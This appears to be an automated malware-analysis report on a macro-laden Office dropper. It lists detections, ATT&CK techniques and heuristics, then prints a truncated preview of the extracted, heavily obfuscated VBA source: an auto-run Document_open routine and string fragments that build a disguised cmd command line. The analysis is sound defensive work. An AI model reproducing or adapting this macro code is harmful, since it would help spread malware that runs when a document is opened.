MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro that utilizes the Shell() function. This indicates the macro is intended to execute external commands or download additional payloads. The ClamAV detection 'Doc.Dropper.Agent-6614044-0' further confirms its malicious nature as a dropper.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6614044-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6614044-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 53363 bytes |
SHA-256: 65b49ba4d91bf241120d6f2e5135b54b466abaea735733894c24931f18d8a009 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "wdNftDs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function fbshZptjIfCiop()
BiHvM = 61628 - fQKCh * NWGsTi - vEtcbf * fvpfFU / KowwI / 62307 + bwGDD * PsbqO - fUzkfU * 64709 + nkbizN
XSJiJ = 86279 - HjoDOH * CfwIbV - zEipp * miJiMr / CNwLp / 73434 + kwlliZ * dXffN - JXOfp * 38161 + AZZJq
UmlbT = 48892 - EjsSI * wdRDZP - AcbQTd * uFobam / uJYPN / 98004 + kjYivu * zYucM - TsKVI * 81766 + OzsQrV
zQBoi = 34038 - AFsSVP * SSoqI - ANIoXc * wYpKkn / lCRKiM / 29682 + udYMZ * XLSErU - mHMRG * 70864 + cPhihT
UtoMQ = 52241 - vDlXi * vjtzN - EBwCG * BlloI / aVNifF / 32113 + oDwGjl * lTSzR - wVAVqi * 78176 + piHvz
mojmSp = 62611 - BSsKQ * IKiwz - MizTWW * oKYcuH / hpqsMX / 41132 + WvmiDc * OvKqhY - oNQwE * 84678 + cqwCc
End Function
Private Sub Document_open()
On Error Resume Next
jHKmoH = (kRGGa - nGwNSJ * 75578 * wHKtt - blwZCf - pbqvJ + 68391 * wcrLcw) + WZKwi / akzAtu * awVhE * hwfIRJ
twoRRu = (cfuNmM - TXTjn * 14047 * XNniU - Gtlwv - aJqzvQ + 99621 * lqFcwf) + FJUppK / VjBizq * iuwSCm * dXYQn
zHEMv = (zojYMA - hmzMND * 50359 * KwLGV - bXVzfm - mGQYpG + 6254 * SzlIl) + jHQLk / qnLsG * EYROZ * OGvfjo
kNfjAf = (VilPSW - bWsRjJ * 54674 * cujwS - wjbkQA - wzDdd + 22693 * KPzqz) + wYTasj / VlkzD * BYwJi * VGdZo
DROuMm = (MFrjh - NurmTw * 18654 * rpbQDr - XEbbN - nzfusE + 36427 * dKrQX) + rsTMJ / FMcndI * qpBPIT * avMrb
BkKsppA = Application.Run("iijVoSLk", "" + TQwRwME + bYojEbqCONMz + CVar("c") + HhParRtp + WQjBbwJVmkFfG + DatHjiZnI + EmXtHMkS + fuaTWwRhiB + dlzVImAOnc + CsfCDP + ETYvhRuD + CdHEAmq + vHstA + jVQvFWZAs + FOUUIZF + FJJOjQ + PiYXpSYu + qZnoI + OKIwLOHsF + BOlwzVKr + ablIASYpN + VZlEdt + YBkfRjJ + ViwfLbqiNK + RIbwam + XJJQCDc + kXiwDvn + TPASCaspE + kpuPBiAcN + PbUzYs + aFPNEdIEsY + qrwZzjVrPE + ZvwvXRPCiHEaEu)
dMojUj = (AiQiX - BDfzdN * 16744 * dbQYaV - iscop - lnYOW + 18706 * jwBQG) + BXwbO / jwzlY * tKSRp * qhOPQG
HNjZu = (siDvjW - jVUMk * 61802 * nGAmjE - MBlAFh - EsvUD + 76718 * KtLCP) + dMSUV / wPANzq * fjhSvd * DbdZsj
DXcno = (zvOSJq - jBJmmo * 20869 * jLWIus - nWVCEz - sbzGiw + 5889 * EIYUzG) + nRGUbT / GftwQ * szHml * JhmjGO
End Sub
Function zCiZzSV()
iHJNwM = (BJbGt - KFWXiG * 54871 * QrKzN - LzXYW - ClwjrO + 40512 * KPGvUJ) + bQVkNL / RPzQlK * EmDjv * ZIqjT
KhsnlR = (wqQjaB - DrvimO * 23618 * SYssk - CYNTwz - HjuRk + 86721 * bodwfY) + MINzj / KOTus * nuSDPi * rvKAR
vBlOcD = (kjBnJn - Thjac * 20673 * FcDLZk - SapQc - sQdlo + 65381 * SYkPaH) + FbJFq / RpZiCC * XSFMW * XWDDvl
skMdK = (EwzAwt - QozVO * 13167 * MYjVY - AHmaSw - YiIMcv + 75629 * SqZLL) + nskQrq / wTDqEN * wMZhBO * mjntTT
kRNVGX = (BzDdzs - INaYq * 73564 * rsHPl - UMZsYr - hYbUbr + 56619 * HjdEE) + WMYtih / sYFGU * RpaKEH * jklFz
End Function
Attribute VB_Name = "YdvwNMUpQAUP"
Function DatHjiZnI()
On Error Resume Next
mRAZjX = (94712 * 1988) - (WIVQJ / 20470 / 80375 * zWLKbd)
hjajb = (33868 * 92526) - (zhhcbj / 15135 / 59274 * SjQcq)
USCzH = PDHDul * DCqKB + TwBjoz - UCWjt / qivEt - bDzzX - 67654 - SsJQT + 20764 / zdJTiN + 3866 + VMjXKp * uIzwCa - TwdAQf - LlDYwH / UcVfG
BZCpdNo = CStr(Chr(KSXiIDdbGPCKNK + zBrWiXRBTYMC + 109 + BDIlLWvdcltPnQ + hGtNUHkwUnAV)) + "d " + "/" + CStr(Chr(qaGHNzBbwunW + cOjAHmq + 99 + GduSKRYW + suTIfCufG)) + " " + "fO^" + "r , " + "/^F ; " + ", " + CStr(Chr(awifVFDzNctkRz + hrJaYNHjKJ + 34 + wNGjzKj + noMUWLmw)) + " de" + "li" + CStr(Chr(IBjNowh + qCUMzzBA + 109 + mHTwHtCz + CVhBHzC)) + "s="
nhjcXL = (76785 * 3720) - (BrWUr / 9828 / 23424 * RbcMHQ)
uRwsPLw = "zWef " + "tok" + "ens= " + "+1 " + " " + CStr(Chr(RmQjToJ + MVULRoXupCb + 34 + zcYKVVTECznz + WXzJwaakjh)) + " ;" + " %" + "^F"
tYdhZ = (60672 * 32097) - (vWCrU / 58471 / 19593 * GbCVz)
Iwhir = (53208 * 31801) - (okMJbW / 88272 / 51872 * fQHpb)
MCBabRPlzlG = " ; ;" + " in " + ", , " + "( " + ", '" + " , " + "," + " F" + "TYP" +
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.